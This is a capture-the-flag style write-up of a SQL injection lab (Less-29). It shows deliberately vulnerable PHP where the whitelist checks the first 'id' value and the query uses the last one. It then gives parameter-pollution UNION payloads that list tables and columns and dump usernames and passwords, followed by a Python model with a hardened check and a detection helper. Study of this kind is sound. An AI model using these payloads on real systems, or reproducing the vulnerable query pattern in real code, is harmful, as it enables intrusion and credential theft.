SQL injection less29 (parameter pollution bypasses WAF)
2022-07-27 22:19:00 【Happy star】
Prerequisite knowledge: [Try to Hack] HTTP Parameter Pollution
There are three files: login.php, hacked.php and index.php.
login.php
<?php
// including the MySQL connect parameters.
include("../sql-connections/sql-connect.php");
// disable error reporting
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
    $qs = $_SERVER['QUERY_STRING'];   // the raw query string, e.g. "id=1&id=2"
    $hint = $qs;
    $id1 = java_implimentation($qs);  // FIRST id= value in the raw query string
    $id = $_GET['id'];                // PHP under Apache: the LAST duplicate wins
    //echo $id1;
    whitelist($id1);                  // the WAF checks $id1, but the query below uses $id
    // connectivity
    $sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    $result = mysql_query($sql);
    $row = mysql_fetch_array($result);
    if($row)
    {
        echo "<font size='5' color= '#99FF00'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}
else {
    echo "Please input the ID as parameter with numeric value";
}
// WAF implementation with a whitelist approach..... only allows input to be numeric.
function whitelist($input)
{
    $match = preg_match("/^\d+$/", $input);
    if($match)
    {
        //echo "you are good";
        //return $match;
    }
    else
    {
        header('Location: hacked.php');  // note: no exit() after the redirect, so the script keeps running
        //echo "you are bad";
    }
}
// The function below imitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string)
{
    $q_s = $query_string;
    $qs_array = explode("&", $q_s);
    foreach($qs_array as $key => $value)
    {
        $val = substr($value, 0, 2);
        if($val == "id")
        {
            $id_value = substr($value, 3, 30);
            return $id_value;   // returns the FIRST id= value it finds
            echo "<br>";        // unreachable after the return
            break;
        }
    }
}
?>
First, let's analyze the whitelist function:
function whitelist($input)
{
    $match = preg_match("/^\d+$/", $input);
    if($match)
    {
        //echo "you are good";
        //return $match;
    }
    else
    {
        header('Location: hacked.php');
        //echo "you are bad";
    }
}
It requires our id to be purely numeric; otherwise it redirects to the hacked.php page.
$qs = $_SERVER['QUERY_STRING'];
$hint = $qs;
$id1 = java_implimentation($qs);
$id = $_GET['id'];
//echo $id1;
whitelist($id1);
$_SERVER['QUERY_STRING'] holds the entire raw query string of the GET request, with all of its parameters.
The java_implimentation function is meant to simulate how a different middleware would parse a polluted query string under HTTP parameter pollution. Our real environment here is only Apache/PHP, and when a parameter is duplicated Apache/PHP resolves it to the last occurrence; this function instead simulates a parser that resolves it to the first occurrence.
// The function below imitates the behavior of parameters when subject to HPP (HTTP Parameter Pollution).
function java_implimentation($query_string)
{
    $q_s = $query_string;
    $qs_array = explode("&", $q_s);
    foreach($qs_array as $key => $value)
    {
        $val = substr($value, 0, 2);
        if($val == "id")
        {
            $id_value = substr($value, 3, 30);
            return $id_value;
            echo "<br>";
            break;
        }
    }
}
$id1=java_implimentation($qs);
whitelist($id1);
So a request of the form ?id=11&id=payload bypasses this WAF: the whitelist checks the first id (numeric), while the query uses the last one.
?id=1&id=-1' union select 1,2,3--+
Then continue with a routine UNION injection:
?id=1&id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+
?id=1&id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=1&id=-1' union select 1,2,group_concat(username,0x3a,password) from security.users --+
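As an added illustration (not part of the original post or of the lab's own code), here is a Python model of the two parsers described above: the first-occurrence reader that the whitelist validates, and PHP's last-occurrence $_GET that actually reaches the query. It also shows a hardened check (an assumed fix, not from the lab) that validates the exact value the query will use and refuses requests sending id more than once. The query strings are constructed to mirror the ones in this post.

```python
import re
from urllib.parse import parse_qsl

# Constructed query strings mirroring the lab's requests (not captured traffic).
CLEAN_QS = "id=1"
POLLUTED_QS = "id=1&id=-1' union select 1,2,3--+"

# fullmatch is stricter than PHP's /^\d+$/, whose $ also tolerates a trailing newline.
NUMERIC = re.compile(r"\d+")


def first_id(query_string):
    """Model of the lab's java_implimentation(): first 'id' in the raw string wins."""
    for part in query_string.split("&"):
        if part[:2] == "id":           # same loose prefix test as the PHP code
            return part[3:33]          # substr($value, 3, 30)
    return None


def last_id(query_string):
    """Model of PHP's $_GET['id'] under Apache: last duplicate wins (URL-decoded)."""
    value = None
    for key, val in parse_qsl(query_string, keep_blank_values=True):
        if key == "id":
            value = val
    return value


def lab_waf_allows(query_string):
    """The lab's whitelist(): it only ever validates the FIRST value."""
    value = first_id(query_string)
    return value is not None and NUMERIC.fullmatch(value) is not None


def value_reaching_sql(query_string):
    """What is actually interpolated into the SELECT: the LAST value."""
    return last_id(query_string)


def hardened_check(query_string):
    """Assumed fix: validate the value the query will use and refuse duplicate 'id'."""
    values = [v for k, v in parse_qsl(query_string, keep_blank_values=True) if k == "id"]
    if len(values) != 1:
        return False
    return NUMERIC.fullmatch(values[0]) is not None


def parser_disagreement(query_string):
    """Detection helper: True when the WAF's view of 'id' differs from the SQL's view."""
    return first_id(query_string) != last_id(query_string)
```

Logging requests where parser_disagreement() is true is a cheap way to spot parameter-pollution attempts against any filter that validates a different copy of the input than the application consumes.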